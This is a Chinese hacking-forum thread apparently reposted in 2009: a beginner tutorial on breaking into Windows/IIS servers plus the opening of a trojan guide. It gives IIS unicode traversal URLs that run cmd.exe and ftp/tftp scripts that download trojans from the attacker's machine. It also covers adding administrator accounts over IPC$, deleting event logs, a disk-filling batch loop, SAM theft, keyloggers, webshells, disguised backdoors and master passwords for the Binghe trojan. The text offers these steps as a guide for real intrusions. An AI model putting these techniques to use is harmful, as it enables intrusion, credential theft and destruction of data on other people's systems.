呢？ps:忘了说一声，顺便扫一下7626,冰河有也说不准哦：）若有ftp,那就用用匿名登陆。自己动手也行，最好用x-scanflux等吧！反正，有ftp就有一份希望telnet在！好!telnet22，出现窗口了吧！嗯？要密码？看来网管还不是超级注意文明用语：）随便猜个，错了，闪人！smtp,看着它，无奈domain，一般它带了局域网了finger可以知道用户列表了，不好，忘了用法了，幸好finger很少出现80肯定在，我们等会来对付它110有smtp，pop在也不奇怪了139找个扫描器来找找有没有露在外面的共享吧，日后也用得着3389太太太好了！！打开客户端吧，用输入法漏洞试试，成了就干了它！不成也没事，我们以后完全控制它3389会很方便的。端口扫完了！我们在多了解它一点吧！追捕大家都知道吧，其实用它获取主机信息也不赖哦。打开追捕，输入ip,选择智能追捕，是不是有很多信息出来了？虽然不能直接利用，但毕竟我们有对它有了进一步的了解。掌握了那么多信息，我们该做点什么了，一般黑客入侵都是靠着系统漏洞，不会都傻傻地去暴力破解的。我们现在就要看看它有什么漏洞。对漏洞大家可能不太了解，我这里也不能一一说明了，太多了，感兴趣的话去论坛找freedom吧！目前广泛利用和存在的漏洞有：unicode,unicode后续，iis溢出，.idq,.frontpageextend,输入法漏洞等等大漏洞。至于如何确定，呵呵，绝对不会是一行一行地在ie中试吧，拿出x-scan吧，很好的扫描器哦！稍微设置一下就上路吧！过了一会，呵呵，报告出来了，快看，哇！漏洞一大堆！这下赚了！各条漏洞都有详细的信息，大家看吧，总比我说的准了。现在这台主机已经和我们成为亲戚了，要让这位亲爱的亲戚做点事，就要开始各种攻击了，下回我们就探讨一下最最可爱的unicode漏洞，各位可能就会在unicode中完成第一次黑客体验回复引用TOPkamil*发短消息*加为好友kamil当前离线帖子2238?精华2?声望169?人民币0元?水晶2468枚?阅读权限150?在线时间211小时?注册时间2008-6-1?最后登录2009-5-25?超级版主帖子2238?精华2?声望169?人民币0元?水晶2468枚?阅读权限150?在线时间211小时?注册时间2008-6-1?最后登录2009-5-25?6#发表于2009-1-2818:50|只看该作者基础知识（中）上传，这个我们后面介绍。几点忠告：1，对于没有主页的机器（就是正在建立的主页），不要改它，这很没水准，也很没道德2，echo前记得帮他们做好备份3，不准在主页里加入恶性语句2，下载文件要是有什么有用的文件被你发现，那我们如何下载呢？最简单的方法：把文件copy至网页目录下。copyc:\email\baby.emlc:\inetpub\wwwroot\baby.zip,然后，下载2/baby.zip就行了，注意！实际应用中要记得对文件名进行修改，总之不能暴露。别的方法：对不起，没想好：）3，最重要的上传一般方法：ftp法首先建一个ftp脚本文件：c:\hehe.haha（名字乱取把），申请一个ftp账号，然后用echo吧echo+open（ftp主机）>c:\hehe.hahaecho+useryourname>>cc:\hehe.haha(yourname是用户名)echo+yourpasswd>>c:\hehe.haha(yourpasswd是密码)echo+getsetup.exe>>c:\hehe.haha要下载的文件echo+quit>>c:\hehe.haha完了以后：ftp+/s:c:\hehe.haha,由于是ftp主机，那么速度一定很快，过一会setup.exe就会出现在当前目录了（也就是cmd所在目录）别忘了先上传到ftp主机，不要做马大哈哦！最简单的方法：tftp法。这种方法不用中转服务器，首先准备一个tftp服务端，它的作用就是把你的机器做成一个tftp服务器，利用漏洞机器来下载（注意，运行tftp时不要运行其他的ftp软件）在这里我推荐ciscotftpserver，自己去找找把，实在没有来找我：）安装好后运行，别忘了设置好默认目录，否则会找不到文件tftp命令：tftp-iGETihateu.exec:\winnt\ihateu.exe（ihateu.exe在默认目录里）为你的ip，用unicode运行一下，会看到tftpserver里有反应了，这就好了，不一会，文件就传上去了，方便把！学会了上传，我们就可以好好改主页，还可以上传木马，还可以把程序放上去运行…………（运行程序和在dos里一样）4，如何清除痕迹虽然国内主机纪录ip的不是很多，但万事小心为妙，unicode权限达不到admin。用cleaniislog行不通，就…………直接删吧！C:\winnt\system32\logfiles\*.*C:\winnt\ssytem32\config\*.evtC:\winnt\system32\dtclog\*.*C:\winnt\system32\*.logC:\winnt\system32\*.txtC:\winnt\*.txtC:\winnt\*.log全……擦掉！四，细节问题。1，遇到长文件名怎么办？c:\programfiles\就用c:\"program20%files"\2，遇到空格怎么办？%代替喽，或者xxyy=xxyy~1基础知识（5）%代替喽，或者xxyy=xxyy~13,如何做个很大的文件？目的就是破坏啦！我不喜欢不过教教你们啦@echooffechobig>c:\a.a:hcopyc:\a.a+c:\a.ac:\a.agotoh注意不要乱来啊！4，输入命令，没反应或反应不对。：）请检查检查再检查命令的正确性，可能没有漏洞，那就闪人！看在你看到这里那么给我面子的份上，在给你几个吧！/scripts/...macr;..À¯../winnt/system32/cmd.exe?/c+dir+c:\或/msadc/.....2/cmd.exe?/c+dir+c:\或/_vti_bin...2/cmd.exe?/c+dir+c:\或/_mem_bin...2/cmd.exe?/c+dir+c:\不一定有用哦！5，如何找到unicode漏洞的主机呵呵：）最好的方法自然是………………一个一个ping,一个一个试喽：）不要打我呀！我说我说。最好找一个cgi扫描器，unicode查找器多如牛毛，随便找个吧！6，我copy，del文件，怎么显示aceessdenined?这个不好办了，由于unicode所拥有的权限有限，出现上述情况很正常，我们要做的便是提高自己的权限！这个我会在今后介绍，现在你可以试试attribattrib-r-h-sc:\autoexec.bat再对autoexec.bat进行操作，看看有没有效果，成功率不高，不好意思！7，我黑了主页，天下无敌？我本来想对你说：“见你的鬼去吧！”不过想想不大礼貌，有失我绅士风度，所以改个口echo主页或改主页在不懂黑客的人看起来很了不起，不过，它最多算是一个基础，拿到admin才是我们的终极目标！对cshu全体成员来说，不准去改正在建立的网页！这是我们的原则！要是你想耍耍威风，那也可以理解，那就去黑外国的，或者url欺骗也是个好选择8，我如何做更多的事？第一，努力提高权限第二，由于cmd的限制，我们可以做的不多，那就要程序帮忙，上传吧！切记，要隐秘！一，frontpage扩展攻击。为什么把它放第一位呢？原因很简单，它最最方便，frontpage服务器扩展是一种方便的远程站点管理功能，可是由于某些网管注意文明用语的疏忽（为什么注意文明用语满街飞？）不设置访问密码，如果那样的话，我们只要用一个frontpage就可以黑它了！！这完全不是黑客工具，但它确实办到了，还要感谢注意文明用语网管和微软啊！具体做法：1，准备frontpage，我是用dreamweaver的，但它不能黑啊：）最好是2000版，只是不要是老掉牙的版本就行了。2，找一台有frontpage扩展的主机，可以用流光，也可以用搜索引擎查找/_vti_pvt/，这是frontpage扩展的标志。3，接下来打开frontpage,(妈妈：你在干什么？回答：做网页！妈妈：好孩子！）文件菜单下选择“打开站点”，然后在文件夹框里写入2（我习惯用这个做例子回复引用TOPkamil*发短消息*加为好友kamil当前离线帖子2238?精华2?声望169?人民币0元?水晶2468枚?阅读权限150?在线时间211小时?注册时间2008-6-1?最后登录2009-5-25?超级版主帖子2238?精华2?声望169?人民币0元?水晶2468枚?阅读权限150?在线时间211小时?注册时间2008-6-1?最后登录2009-5-25?7#发表于2009-1-2818:51|只看该作者基础知识（下）netuseriusr_machinenamecshu（把它的密码设为cshu）netlocalgroupadministratorsiusr_machinename/add（加入administrators组）这样我们就拥有了iusr_machinename这一账号，admin权限，简单吧！熟悉一下netuse命令：netuse\\2\ipc$"cshu"/user:iusr_machinename建立连接copyc:\haha.exe\\2\admin$把haha.exe复制到机器c:\winnt\system32上，若是c$.d$,就表示c,d盘nettime\\2看到了时间了，比如是8点at\\28:03haha.exe就会在8点3分执行。netuse\\2/delete断开连接应该是很简单的。这样我们就可以随心所欲地操作2了，admin是最高权限，所以没有限制的：）是不是很简单？所以我是溢出是很厉害的攻击方法。3389知道吧！如果能进入，那么用上面的命令也可以轻易拿到admin的，不过呢，有3389漏洞的机器已经不多了。看你运气了！（本站有几篇关于3389的好文章）总的来说，还是unicode的机器最多，为什么注意文明用语网管不会灭绝呢：）虽然unicode拿admin有一定难度，但还是要试试的。首先，我们检查一下unicode在这台机器上的权限，一般看读写权限和运行权限。用copy或del命令便可确定读写权限，然后上传文件运行一下便可知道运行权限。1，如果我们可以对winnt\repair和winnt\config进行访问，sam文件就在里面（win2k里是sam，nt4里是sam._）那么用tftp把get改成put下载下来，或者把它复制到inetpub\wwwroot下，改成zip下载。拿到sam后，用lc3破解版暴力破解吧，这种方法比较费时。2，要是有运行权限，拿就抛个木马上去吧！虽说木马可能也会没有权限，但自启动的模式在admin登陆后可能会自己提升了权限。要注意的是，最好放最新的木马，因为木马很容易被杀毒软件查杀！3，其实和2差不多，只不过变成了键盘记录器，选个国产的，一般杀毒软件不会杀出来，认真配置好后传上去，下线睡觉或是做家务去！等到网管用了机器，密码就会被纪录下来，我们在去取，admin就顺利到手了：）4，getadmin和pipeupadmin，前者是nt4用的，后者是2000。看看帮助知道使用方法后（其实猜都猜得到）就可以提升一个用户的权限，有一步登天的感觉！5，手工做个bat文件，里面是建立用户等命令，然后把它放到自启动下，有很多途径：documentsandsettings下的开始菜单下的启动，知道了吧，至于要顺利放进去的话，会遇到空格长名等等问题，就看你的基本功了。win.ini里有load，加进去。还有便是注册表，好好研究一下regedit.6，本地溢出。这个比较高深，我能告诉大家的只是，去四处找找本地溢出程序。总的来说，unicode改主页是非常简单的，但是若是要取得更高的权限，就要一番努力，上面的方法只是些思路，实际操作时需要具体处理，开动脑筋，把方法都结合起来。（是不是听起来有点玄？）想想好像没有什么其他的途径要说了，什么？linux,呵呵，我还不大懂，就不在这里瞎说了。那今天就说到这里了，6里面我会说说后门制作，小问题和我的一点经验。期待吧！这是最后一节了，写的傻傻的，但我毕竟坚持下来了，值得鼓励！（偶尔阿q一下）在写菜鸟操的同时，我们的cshu()也在默默成长，但现在我要准备离开了，真是有点舍不得。在今后的日子里，还请大家多多支持cshu和christ,freedom他们。今天说点什么呢？没有主题，乱谈一通吧！首先我要吐一次血，当然是为了推荐一样东西，就是流光！（那么没创意，老土！）不管怎么说，小榕的流光应该是中国第一黑软，他综合了诸多的攻击手段，使攻击便捷化，当然可能让我们养成了懒惰的习惯。不会用流光的最好去学学。我来说说我自己觉得最有用的几个项目：1，探测扫描pop3/ftp/nt/sql主机，要是无目的地黑，那么用这个再合适不过了。进去后填好ip范围（范围可以扫大一点，它很快的），至于类型嘛，要是你要一大堆unicode，那么选择iis/frontpage再合适不过了，要是要更高的权限，sql是不错的选择。完成后，表格里会多出一大堆东西。remoteexecute-x这是几种不同的unicode，用它比用ie来执行方便多了，但是echo有问题（是我自己不会，会的朋友快教我）remoteftppcawfilemethod-x这是远程获取pcanywhere的密码文件，要使用的话，你首先要有一个ftp账号，去申请吧！顺利拿到cif文件后，用流光自带的工具就可以解开密码，很爽的！remoteftpsam-x拿sam的，还是用最好的lc3来解吧！frontpageextended这是frontpage扩展，不过不要高兴，是要密码的。但是若是后面跟了privilegehole的话，放声大笑吧！（小心不要让邻居拿着菜刀冲进来）打开frontpage，打开站点，http://ip就可以了！（http://不要忘）此外还有一点变通，大家肯定读的懂的。2，探测高级扫描工具。这可是流光4中的重头戏，综合了很多漏洞，还可以用plugin功能加入新的漏洞。这项功能很适合对某一站点进行探测，很快扫出漏洞后，流光会生成一个报告文件，其中包含漏洞的连接，要是你看不懂的话，建议你拿出x-scan，里面有漏洞描述的。3，工具nt管道远程命令，种植者，这两项功能对我们攻击nt来说是相当好用的。但前提是要有账号，相信在此之前你应该有几个了吧，那就快点试试吧！总的来说，流光的使用是非常简单的，其中也有不少工具值得我们一用，tools目录里有一些很好的工具，exploit里则有很多溢出攻击程序，前提是你应该会c,不会的话我也没办法，学会c起码要看10倍于菜鸟操的资料吧！另外给大家推荐一个站点：www.hack.co.za，有什么漏洞的话就去那里找找，你会有所收获的。然后我想说说一些黑站的经验。☆当我们用unicode控制一台机器时，我向大家推荐用asp木马，阿新的改良版，本站有下载的。上传asp文件前不要忘了修改list.asp中的地址信息，最好也放一个cmd.asp上去，运气好的话，可以运行命令的。上传好后，ie里输入其中index.asp的地址，呵呵，我们就能方便地管理其中的文件了，可以改网页，改代码，上传脚本文件麻烦？那就用它来生成吧！推荐他的最大原因便是便于隐藏！一般网站总有一个庞大的目录，选择一个深的，放进去，网管很难发现的：）最后对大家说一句，要是有备份目录（很多网站都有的），最好也放一份进去。有一次我用这个东西修改一家网站的首页，改了两三次网管也没删掉，可是突然一天不行了，原来他用了备份的网页（还算机灵吧）☆我想对大家说，对于国内网站，最好不要恶意去攻击，因为我们是中国人嘛！在5/1期间，我发现有一些国内站点被黑，留下的页面上不是poisonbox，而是中国人的话，这真是无耻到了极点！！！！大家千万不要学哦。还有，现在网上有很多还没有网页的主机，往往有很多漏洞，对于这种机器，竟有一些小人也会去改收页（比如上海那个姓杨的小子）这算什么？显示实力，炫耀技术？呵呵，见鬼去吧！我的建议是，不要改它的首页，而是努力去拿admin,控制它，这样我们有很多选择：肉鸡，等它有正式主页后可以黑，或者把我们的主页放上去！比申请好多了，权限又足！当然很危险：）这样做是不是有品位多了？☆要是我们拿到了admin，但有时却不能执行一些命令，那很可能是因为服务启动的问题。试着用以下命令：netstarttermservice启动win2k的终端控制netstartworkstation打开netuse功能netstartlanmanserver打开ipcnetstarteventlog启动日志（你不会那么傻吧！stop）netstartschedule打开计划(at)netstartserver共享还有很多，net命令里去找吧！☆打开telnet1，远程去运行ntlm.exe，流光里有2，netstoptelnet3,netstarttelnet☆我推荐几种后门：winshell（默认端口5277）相对于srv，它好一些。remotenc这个是榕哥的作品，可以以指定用户执行，还可以自己起服务的名字，很棒的！至于服务的名字，建议大家去看看win2k的进程名，学着起相类似的名字，要做到使网管看到了也不会引起警觉，或是有警觉也不敢去删，呵呵，这样就最好了！☆代理问题。我推荐大家自己去做代理，控制了一台机器后，用snake前辈写的skserver去做个sock5。具体做法就不详细说了，因为比较普通，只要熟悉一下用法就可以了。做好了sock5，我们可以上oicq，下棋都用它，sock5代理可是很少见的哦！要是实在拿不到sock5,用http也可以，这里推荐一个软件tcp2http，它具有很多功能。在给个站点：国内最最好的的代理站点，怕死的朋友千万不要错过。最后说说一些对于菜鸟同志的建议：不要把黑当作一种显示自己的行为，要是你想耍威风，用url欺骗来骗mm最合适了，还可以弄个yahoo什么的……不要在一项技术上停留过长时间，当你熟练掌握后，应该迅速学习下一个新技术。不要和被你黑的网管过多接触，前车之鉴哦。对于一台好机器要做好后门，不要轻易失去它。想好好学黑客的话，就常去各大论坛转转，仔细读教程，忘记聊天室和网络游戏吧！实践是最好的教程，再次重申！应该多学计算机的其他方面的知识，任何知识在一定场合都是有用的。编程技术……好像太难了，不过再难也要学。想不出来了………………好了，我们的菜鸟操终于结束了，我这个大菜鸟也可以退休了，拼搏一年后我会回来的。第一节里我曾许诺让大家学会黑站，不知道大家是否成功了，不管这么样，我们都该不断的努力学习，不是吗?回复引用TOPkamil*发短消息*加为好友kamil当前离线帖子2238?精华2?声望169?人民币0元?水晶2468枚?阅读权限150?在线时间211小时?注册时间2008-6-1?最后登录2009-5-25?超级版主帖子2238?精华2?声望169?人民币0元?水晶2468枚?阅读权限150?在线时间211小时?注册时间2008-6-1?最后登录2009-5-25?8#发表于2009-1-2818:51|只看该作者黑客常用兵器之木马篇（上）“我知道远程控制是种武器，在十八般兵器中名列第七，木马呢?”“木马也是种武器，也是远程控制。”“既然是远程控制，为什么要叫做木马？”“因为这个远程控制，无论控制了什么都会造成离别。如果它钩住你的E-Mail，你的E-Mail就要和你离别；如果它钩住你的QQ，你的QQ就要和你离别。”“如果它钩住我的机器，我就和整个网络离别了?”“是的。”“你为什么要用如此残酷的武器?”“因为我不愿被人强迫与我所爱的人离别。”“我明白你的意思了。”“你真的明白?”“你用木马，只不过为了要相聚。”“是的。”一在众多的黑客武器中特洛伊木马（Trojanhorse）这种攻击性武器无论是菜鸟级的黑客爱好，还时研究网络安全的高手，都视为最爱。虽然有的时候高手将木马视为卑鄙的手段。但是作为最为有效的攻击工具，木马的威力要比其他的黑客工具大得多。“木马既然如此有效，为何在Hacker兵器谱中排名靠后？”“因为使用木马往往不是很光明正大。”“哦？为何？”“在使用木马的人群中菜鸟黑客居多，他们往往接触网络不久，对黑客技术很感兴趣，很想向众人和朋友显示一番，但是去驾驭技术不高，不能采取别的方法攻击。于是木马这种半自动的傻瓜式且非常有效的攻击软件成为了他们的最爱。而且随着国产化的木马不断的出现，多数黑客的入门攻击几乎无一例外都是使用木马。当然对于那些黑客老手来说他们也并不是不使用木马了，他们通常会在得到一个服务器权限的时候植入自己编写的木马，以便将来随时方便进出这台服务器。”“但如此一来木马的名声不就随之降低了吗？”“是的，所以现在的黑客高手都耻于用木马，更耻于黑个人的计算机。”“不过木马在很多人的眼中仍然是一等一的绝好兵器。”在众多的木马之中CultofDeadCow开发的BackOrific2000应该算是名气比较大的一个。这款软件是在BackOrific2.1的基础之上开发的，但是他最大的改动就是增加了对WindowsNT服务器系列的支持。作为微软的高端产品，BO2000的这个功能无疑对WindowsNT来说是致命的，就WindowsNT本身而言，由于硬盘采取了NTSF的加密，普通的木马，包括冰河也无法控制，当然要想要让多数木马无法对WindowsNT发挥作用最好将WindowsNT转化为NTSF的格式下才会比较好用一些。而正因为如此BO2000才深得黑客高手的喜爱，因为他们感兴趣的也只有服务器，也只有WebServer才能够提起他们的胃口，那是一种来自深层感官的刺激。通常情况下木马大致可分为两个部分：服务器端程序和客户端程序。服务器端通常就是被控制端，也是我们传统概念上的木马了。二“你说BO2000好，但是绝大多数的杀毒招数都能够沟将其制服，而且我感觉他在使用上不如我手里的冰河锐利，况且我也不想黑什么服务器。我认为，个人电脑中隐藏有更大的宝藏，而且个人电脑脆弱的我能够利用任何一种方法摧毁它。“你说的很对，冰河确实锐利，而且称霸中华江湖一年之久，也可谓武林中少见的好兵刃，但是兵器虽然锋利，但兵器在打造的时候却留下来一个致命的缺点，这也是木马冰河为何在武林衰败的原因。”“这是一个什么样的弱点那？竟然如此致命？”“呵呵，说白了也很简单，冰河的作者在打造冰河2.X版本时就给它留下了一个后门，这个后门其实就是一个万能密码，只要拥有此密码，即便你中的冰河加了密码保护，到时候仍然行同虚设。”“什么！真有此事？想我许多朋友还因为冰河好用把它当作了一个免费的远程控制程序来用，如此这般，他们的机子岂不暴露无遗？”“呵呵，在黑客中瞒天过海、借花献佛这些阴险的招数都不算什么，多数木马软件的作者为了扩大自己的势力范围和争取主动权都会留一手，致命的一招。冰河的作者当然也不例外，而且由于作者钟爱许美静，所以每一个冰河中都包含许美静的歌词。当然作者为自己以后行事方便也留了几个万能密码。”“噢？万能密码？”“通常黑客在植入冰河这种木马的时候，为了维护自己的领地通常的要为自己的猎物加一个密码，只有输入正确的密码你才能够正常的控制对方的计算机，但是冰河的打造者为了方便自己的使用在冰河中加入了一个万能的密码，就像万能钥匙一样。冰河各版本的通用密码：2.2版：CanyouspeakChinese?2.2版：051819773.0版：yzkzero!4.0版：051819773.0版：3.0版：yzkzero!3.1-netbug版密码:123456!@2.2杀手专版：051819772.2杀手专版：dzq20000!你可以试试看，是不是很轻松的就能够进入任何一台有冰河服务器端的电脑？”“真的进入了，果然有此事情，怪不得现在很多人都不再使用冰河。”“此外冰河还存在着两个严重的漏洞：漏洞一：不需要密码远程运行本地文件漏洞。具体的操作方法如下：我们选择使用相应的冰河客户端，2.2版以上服务端用2.2版客户端，1.2版服务端需要使用1.2版客户端控制。打开客户端程序G_Client，进入文件管理器，展开“我的电脑”选中任一个本地文件按右键弹出选择菜单，选择“远程打开”这时会报告口令错误，但是文件一样能上传并运行。任何人都可以利用这个漏洞上传一个冰河服务端就可以轻松获得机器的生死权限了，如果你高兴的话，还可以上传病毒和其它的木马。漏洞二：不需要密码就能用发送信息命令发送信息，不是用冰河信使，而是用控制类命令的发发送信息命令。”“当然这的确是一个原因，但更主要的是现在的多数杀毒软件都能克制冰河。”三木马通常会在三个地方做手脚：注册表、win.ini、system.ini。这三个文件都是电脑启动的时候需要加载到系统的重要文件，绝大部分木马使用这三种方式进行随机启动。当然也有利用捆绑软件方式启动的木马，木马phAse1.0版本和NetBus1.53版本就可以以捆绑方式装到目标电脑上，可以捆绑到启动程序上，也可以捆绑到一般程序的常用程序上。如果木马捆绑到一般的程序上，启动是不确定的，这要看目标电脑主人了，如果他不运行，木马就不会进入内存。捆绑方式是一种手动的安装方式，一般捆绑的是非自动方式启动的木马。非捆绑方式的木马因为会在注册表等位置留下痕迹，所以，很容易被发现，而捆绑木马可以由黑客自己确定捆绑方式、捆绑位置、捆绑程序等，位置的多变使木马有很强的隐蔽性。“在众多木马中，大多数都会将自己隐藏在Windows系统下面，通常为C:\Windows\目录或者C:\Windows\system\与C:\Wi